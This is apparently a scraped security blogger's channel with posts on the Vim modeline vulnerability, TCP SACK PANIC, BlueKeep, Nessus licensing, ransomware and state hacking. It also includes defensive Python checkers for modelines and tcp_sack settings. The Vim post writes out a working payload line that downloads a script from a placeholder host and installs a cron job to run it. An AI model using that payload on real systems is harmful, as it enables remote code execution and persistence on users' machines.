Vulnerability Management and more
Vulnerability assessment, IT compliance management, security automation.
Russian channel: @avleonovrus
Russian live news channel: @avleonovlive
PM @leonov_av
GVM will be installed very quickly, in just a few minutes, and all GVM components can be managed comfortably with the services. The new HTML5 interface is MUCH faster and better. 😉
This latest Vim vulnerability is pretty cute. Technically, when a user opens a malformed file with Vim, they execute some bash script. This script can download something malicious, for example a cryptolocker, and then add a cron job to execute it at a convenient time. Anything!

For example,

echo ':!curl "https://dangerous-site.com/very_dangerous_script.sh" > /tmp/malscript.sh; chmod +x /tmp/malscript.sh; crontab -l > mycron; echo "* * * * * /tmp/malscript.sh" >> mycron; crontab mycron; rm mycron||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="' > test.txt

The only problem is that "Debian, Ubuntu, Gentoo, OSX, etc. by default disable modelines for security reasons". 😉 So, it makes this vulnerability practically unexploitable in real life.

To check it on Ubuntu I needed to

sudo vim /etc/vim/vimrc
...
set modeline
set modelines=5
...
I couldn't make it work with the current #Vim version in #CentOS 7.6.1810 with modeline set. 😟 Probably because the version is too old: "VIM - Vi IMproved 7.4". soji256 also couldn't run it in CentOS. So, it seems that to be successfully attacked the target CentOS user should install Vim from sources, but not the latest version, for example this one (I haven't checked it), and use it with modeline enabled. This is probably a pretty rare combination. 🙂 But if you could run it with the default CentOS Vim, please let me know at @leonov_av, I'm curious 😉
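The two things worth checking on the defensive side are whether a host's vimrc actually leaves modelines on and whether any file about to be opened carries a modeline that sets expression-evaluated options (the `fdm=expr:fde=...` pattern the payload above relies on). The checker below is an added example written for this post, not code from the post or from the Vim project; the set of options it flags as "expression-evaluating" and the sample file and vimrc texts are this example's own constructions.

```python
import re

# Vim's two modeline forms (see ":help modeline"):
#   [text]{white}{vi:|vim:|Vim:|ex:}[white]{options}
#   [text]{white}{vi:|vim:|Vim:|ex:}[white]se[t] {options}:[text]
# The marker must be at the start of the line or preceded by whitespace.
MODELINE_RE = re.compile(r'(?:^|\s)(?:vi|vim|Vim|ex):\s*(.*)$')

# Options whose values are Vim expressions evaluated when the file is opened.
# Which options to flag is this checker's assumption, not a list from the post.
EXPR_OPTIONS = {"fde", "foldexpr", "fex", "formatexpr",
                "inex", "includeexpr", "inde", "indentexpr"}
FOLD_OPTIONS = {"fdm", "foldmethod"}


def parse_modeline(line):
    """Return the option tokens of a modeline found in `line`, or None if there is none."""
    m = MODELINE_RE.search(line)
    if not m:
        return None
    opts = m.group(1)
    setform = re.match(r'se(?:t)?\s+(.*?):', opts)  # "set ts=4 sw=4:" form
    if setform:
        opts = setform.group(1)
    # Options are separated by whitespace or unescaped colons.
    return [t for t in re.split(r'\s+|(?<!\\):', opts) if t]


def risky_options(tokens):
    """Tokens that make Vim evaluate an expression just by opening the file."""
    flagged = []
    for tok in tokens:
        name, _, value = tok.partition("=")
        if (name in FOLD_OPTIONS and value == "expr") or name in EXPR_OPTIONS:
            flagged.append(tok)
    return flagged


def scan_text(text, modelines=5):
    """Inspect only the lines Vim would: the first and last `modelines` lines."""
    lines = text.splitlines()
    candidates = {}  # index -> line; a dict dedupes the overlap in short files
    head = range(min(modelines, len(lines)))
    tail = range(max(0, len(lines) - modelines), len(lines))
    for i in list(head) + list(tail):
        candidates[i] = lines[i]
    findings = []
    for i in sorted(candidates):
        tokens = parse_modeline(candidates[i])
        if tokens is not None:
            findings.append({"line": i + 1, "options": tokens,
                             "risky": risky_options(tokens)})
    return findings


def modeline_config(vimrc_text):
    """Effective 'modeline'/'modelines' settings from vimrc-style text.
    Vim's built-in default is modeline on (off for root) and modelines=5;
    Debian-family system vimrcs set nomodeline, which is why the post's
    payload does nothing there by default. Later lines override earlier ones."""
    enabled, count = True, 5
    for raw in vimrc_text.splitlines():
        line = raw.strip()
        if not line or line.startswith('"'):
            continue
        m = re.match(r'se(?:t)?\s+(.*)$', line)
        if not m:
            continue
        for tok in m.group(1).split():
            if tok == "modeline":
                enabled = True
            elif tok == "nomodeline":
                enabled = False
            elif tok.startswith("modelines="):
                count = int(tok.split("=", 1)[1])
    return {"modeline": enabled, "modelines": count}


# Constructed sample: a benign modeline on line 1, an expression-setting one on line 10.
SAMPLE_FILE = "\n".join(
    ["# vim: set ts=4 sw=4 et:"]
    + ["plain text line %d" % n for n in range(2, 10)]
    + ['closing text vi:fen:fdm=expr:fde=attacker_expr():fdl=0:fdt="']
)

if __name__ == "__main__":
    for finding in scan_text(SAMPLE_FILE):
        print(finding)
    print(modeline_config('" Debian default\nset nomodeline\n'))
```

Run against a real file, `scan_text(open(path).read(), modeline_config(open('/etc/vim/vimrc').read())["modelines"])` ties the scan window to the host's actual `modelines` value; a result with a non-empty `risky` list is what a mail gateway or repository pre-receive hook would want to quarantine for review.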
I usually don't write about politics here, but the latest scandal about US cyber attacks on the Russian power grid is pretty hilarious. OMG, who would have thought that Americans can do such creepy offensive stuff?! What a shock! What is the most interesting, The New York Times writes about it, not RT or Sputnik. Now, according to Mr. President, the journalists of this newspaper "committed treason" and at the same time it's "also, not true". BTW, I thought calling citizens "the enemy of the people" is something from the Soviet era. In which direction are you guys moving? 🙂
Joking aside, I find it quite sick and dangerous. I don't like the rhetoric that if State A makes attacks on the critical infrastructure of State B (first of all, what are the proofs? accurate attack attribution is almost impossible nowadays), State B should do the same with State A using undisclosed vulnerabilities and backdoors. It's not the "equivalent of land mines" at all, it's a full-scale offensive operation. At a minimum, this leads to the fragmentation of the global IT and InfoSecurity market and escalates the witch-hunt (#ERPScan, #Kaspersky, #Huawei, whatever next). Just because you can no longer trust foreign vendors. Less competition means lower product quality and higher prices for the customers.
Yay. Now it's official: TCP SACK PANIC - Kernel vulnerabilities

CVE-2019-11477 - A sequence of SACKs may be crafted such that one can trigger an integer overflow, leading to a kernel panic.
CVE-2019-11478 - It is possible to send a crafted sequence of SACKs which will fragment the TCP retransmission queue.
CVE-2019-11479 - An attacker can force the Linux kernel to segment its responses into multiple TCP segments, each of which contains only 8 bytes of data. This drastically increases the bandwidth required to deliver the same amount of data.

Disable SACK processing (/proc/sys/net/ipv4/tcp_sack set to 0) or install patches! 😉 Pretty simple DoS exploits for these vulnerabilities should appear soon...
#TCPSACKPANIC #Linux #Kernel #SACK
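The post gives two options, patch or set tcp_sack to 0, and the practical question on a fleet is which hosts are in which state: SACK on at runtime, a workaround persisted in sysctl configuration (or only applied at runtime and lost at reboot), and whether the fixed kernel is already installed. The helper below is an added example for this post, not code from the post or from any distribution's advisory; the drop-in file name is this example's choice, the sysctl.conf parsing follows the documented `key = value` / comment syntax, and whether a kernel is patched is taken as an input because the post states no version boundary.

```python
from pathlib import Path

# The knob path is the one from the post; the drop-in file name is this example's own.
TCP_SACK_KNOB = Path("/proc/sys/net/ipv4/tcp_sack")
SYSCTL_DROPIN = Path("/etc/sysctl.d/99-tcp-sack-workaround.conf")


def parse_sysctl_conf(text):
    """Parse sysctl.conf syntax: '#'/';' comments, 'key = value', optional leading '-'
    (which only tells sysctl to ignore errors for that key)."""
    values = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        values[key.strip().lstrip("-")] = value.strip()
    return values


def persisted_sack_setting(conf_texts):
    """Effective persisted net.ipv4.tcp_sack over config files read in order
    (later files override earlier ones, as `sysctl --system` does); None if unset."""
    setting = None
    for text in conf_texts:
        setting = parse_sysctl_conf(text).get("net.ipv4.tcp_sack", setting)
    return setting


def runtime_sack_enabled(knob=TCP_SACK_KNOB):
    """True if the running kernel currently processes SACK (knob reads '1')."""
    return knob.read_text().strip() == "1"


def recommend(sack_on, persisted, kernel_patched):
    """Map the post's two options onto one host's state. `kernel_patched` must come
    from the distro advisory / package version; it is an input, not detected here."""
    if kernel_patched:
        if persisted == "0":
            return "patched: remove the tcp_sack=0 workaround to regain throughput"
        return "patched: no action"
    if sack_on:
        return "unpatched and SACK on: install kernel update or set net.ipv4.tcp_sack=0"
    if persisted != "0":
        return "unpatched, SACK off at runtime only: persist net.ipv4.tcp_sack=0 or it returns at reboot"
    return "unpatched but SACK disabled: workaround in place, still schedule the kernel update"


def apply_workaround(knob=TCP_SACK_KNOB, dropin=SYSCTL_DROPIN):
    """Disable SACK now and persist it. SACK off costs throughput on lossy links,
    so treat this as interim and revert once the kernel update is installed."""
    knob.write_text("0\n")
    dropin.write_text("# TCP SACK PANIC interim workaround\nnet.ipv4.tcp_sack = 0\n")
    return not runtime_sack_enabled(knob)


if __name__ == "__main__":
    # Constructed sample config files, in the order sysctl would read them.
    confs = ["net.ipv4.tcp_sack = 1\n", "# later drop-in wins\nnet.ipv4.tcp_sack=0\n"]
    persisted = persisted_sack_setting(confs)
    sack_on = runtime_sack_enabled() if TCP_SACK_KNOB.exists() else True
    print(recommend(sack_on, persisted, kernel_patched=False))
```

On a real host, `persisted_sack_setting` should be fed `/etc/sysctl.conf` and the `/etc/sysctl.d/*.conf` files in the order `sysctl --system` reads them, and `apply_workaround` needs root; the return value of `recommend` is what an inventory job would record per host so the workaround can be reverted after the kernel update.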
BTW, do you think there will be a new massive malware attack soon similar to WannaCry, but with the use of the latest RDP RCE vulnerability (CVE-2019-0708)? Let's say during the next 30 days.
30 days have passed since the poll, and NO massive cyber attack based on #BlueKeep vulnerability occurred. What conclusions can we draw?

Well, it is very difficult to predict the real exploitability potential of a vulnerability based only on its description. Even if it is RCE, even if well-known vendors confirmed that they were able to write an exploit (but did not publish it), this does not guarantee that the vulnerability will be widely used in cyber attacks soon and so you should give it the highest priority in remediation.

That does not exclude the possibility that an RCE exploit for this vulnerability is currently used in highly focused attacks, and the real action will occur with the leak of this exploit. Will it happen tomorrow? Who knows.
Three days ago NASA published a very interesting document, "Cybersecurity Management and Oversight at the Jet Propulsion Laboratory". Most media outlets mentioned it as "#NASA was hacked using #RaspberryPi". Yes, this is true, you can find information about this incident in the document under "April 2018". But it's not even the most interesting part. There are many great and funny details about their CMDB-like system "Information Technology Security Database (ITSDB)", lack of network segmentation, unpatched vulnerabilities, etc. And all this in ordinary, not very formal language. It seems like a good example of how Information Security should and should NOT be managed in a big organization, and awesome weekend reading. 😊
A great set of software development tips: "Things I Learnt The Hard Way (in 30 Years of Software Development)". The blog is about .Net and TDD (test-driven development), but the tips are quite universal. I totally agree with everything that I have read there, especially with the tips related to documentation and "be ready to throw your code away [...] Your code is not a wall: if you have to throw it away, it is not wasted material. Surely it means your time writing code was lost, but you got a better understanding about the problem now." I think such things should be taught in schools. It's really important for the right mindset.
I did not find this on Tenable's website, only in the blog post of the Russian distributor, but it seems that Nessus Professional 8.5, which will be released tomorrow, will behave differently after the license expiration. On the first day it will switch off all the scanning capabilities and plugin updates. Then within 30 days there will be an option to download existing scan results. After that all functions will be blocked. This is not good news, because now any delay in license renewal, which happens in large organizations, will break the whole Vulnerability Management process completely.

The new price will be $2,390 per year, $2,190 for the renewal. There will also be small discounts for those who order licenses for 2 and 3 years (2.5% and 5%).
Currently my favorite city in the USA is Riviera Beach, Florida. 🙂 The story is wonderful (pastebin for those who have problems with access to the site). The city administration was paralyzed by a #cryptolocker, because some employee of the local police department clicked on a malicious link in an email. And of course there were no backups. The situation is ordinary. But the decision is rather unusual: the city council decided to pay a ransom of $600,000 in Bitcoins to get their data back. Without any guarantee that the data will be decrypted and against the direct recommendations of the FBI.
There are no technical details, but if multiple servers were affected there should be problems with network segmentation and unpatched servers (probably, the lack of the MS17-010 patch). But none of these problems were mentioned in the media. In the media, council representatives say they need to buy new desktops, laptops and a backup system. With such an attitude, it probably won't be the last time they encounter such problems.

And, of course, the most intriguing question is whether or not they will pay the ransom and get the decryption key. If they spend so much money for nothing, it will be legendary! 🤩

PS: An interesting fact is that they actually bought a new backup system before the incident for $798,419, but it was not deployed on time. 😉 #ransomware
The vulnerability detection plugin vulners.nse is now part of Nmap, the most famous network scanner in the world! Officially! It took two years since the initial plugin release. Congratulations to the #Vulners Team! Great job!
Everything that I wrote earlier about the new behavior of #Nessus 8.5 after the license expiration turned out to be true.

#Tenable also edited the GUI a little bit. They separated Report (HTML and CSV) and Export (Nessus v2 XML and Nessus DB). Now you can make a report for selected hosts or vulnerabilities in a more natural way. They also added these cool buttons to the scan results pages (they may have been added some versions before, but I didn't notice): you can snooze a vulnerability for some time, edit its criticality or even delete an entire host from the scan. And all this you can do for several selected vulnerabilities and hosts. Pretty cool.

They also switched off the limits for Host Discovery scans in Nessus Pro Eval and Nessus Essentials (!!). Well, for Nessus Pro Eval it's not so great, because we remember the time when there were no limits in the trial version at all. 😉 But it makes the free Nessus Essentials much more useful for organizations.
A few words about the Reuters "Yandex was hacked" article.

1. It is rather sad that a modern journalistic investigation may be based on some information from 4 anonymous sources without any proof. The only interesting details are: Western intelligence (yep, once again) as the attacker, Regin malware as the tool, network access for several weeks as the result, user authentication methods in the Yandex Email service as the goal. The representative of Yandex responded like "there was an attack at the end of 2018, but our IT security guys successfully dealt with it". So, there is nothing to discuss in any serious way.
2. It seems meaningless to spend so many resources on hacking a free Email service. On the other hand, as we have seen from the scandalous email leaks, important communication in Russia can really be conducted through the free email services Yandex.ru and Mail.ru, and even without any encryption. 🙈 I won't give any examples, but you can google it easily. A universal way to access these emails might be, theoretically, a very tasty goal for any intelligence service.

3. However, from the same email leaks (and, more importantly, the details of the criminal case [wiki: eng, rus - much more informative]) we can see easier and more reliable ways of accessing such emails (phishing, fake Wi-Fi hot spots, fake BTS - rus) than trying to attack the Email service directly.
HBO released the TV series #Hackerville (nickname of the Romanian city Râmnicu Vâlcea, a famous center of cybercrime). From the trailer it seems that the series will NOT be technically accurate (OMG, is it too difficult and expensive to hire a technical consultant?!), but in any case, it might be fun to watch. 🙂
What I like the most about software vulnerabilities is how "vulnerability", as a quality of a real object (and the computer program is real), literally appears from nothing.
Let's say we have a fully updated server. We turn it off, lock it in a safe and forget about it for half a year. Six months later, we take it out and turn it on. It is the same and works absolutely the same. But now it is also exposed to dozens of critical vulnerabilities that, with some (un)luck, can be exploited by any script kiddie. A new important characteristic of the material object appeared from nowhere, isn't this magnificent? 🤩 #fridaytalk
Of course, this only happens because many people constantly and comprehensively study software products. But we know so little about it, that it seems almost like magic. For example, do you know how many security researchers analyze Windows or Linux kernel (hundreds, thousands, maybe more)? Who pays them? What is their main motivation? Do they always report what they found to the software vendors?

As for the last question, it seems rather naive to think that all the researchers send their most valuable findings to the vendors, even for the bounty. Especially those researchers who work for governments and criminal groups. In my opinion, the publicly known vulnerabilities which cause us so much trouble with patching are only the smallest part of all existing vulnerabilities. And it's scary to think what is going on in the main private zone, where all the wunderwaffen and all the rings-to-rule-them-all should be. 😉
We mainly know how the #NSA processes 0-day vulnerabilities and exploits. Many thanks to the #EFF and other organizations who forced them to disclose the "Vulnerabilities Equities Policy and Process for the United States Government" (2017). There are no technical details or valuable statistics in it, only some descriptions of bureaucratic procedures, but it shows the attitude. Do you think that in other countries governments deal with vulnerabilities in a more ethical way and report them to vendors immediately? I don't think so.
Can money solve the problem with unreported vulnerabilities? Responsible disclosure may become more attractive to independent researchers if the size of the bounty were comparable to the prices on the black market (now it's not). But individual researchers are not the only actors. What about the armies of government hackers that reverse the code in their barracks day after day for a cup of rice? And what about the vulnerabilities that are in fact backdoors left by the vendors intentionally? I don't see any good and safe solutions for this. This is too far from technologies and mainly concerns geopolitics and violence.

Once again, it's a big, dangerous world, you know. We see only the smallest part of all existing vulnerabilities and, unfortunately, even with them we can't deal effectively.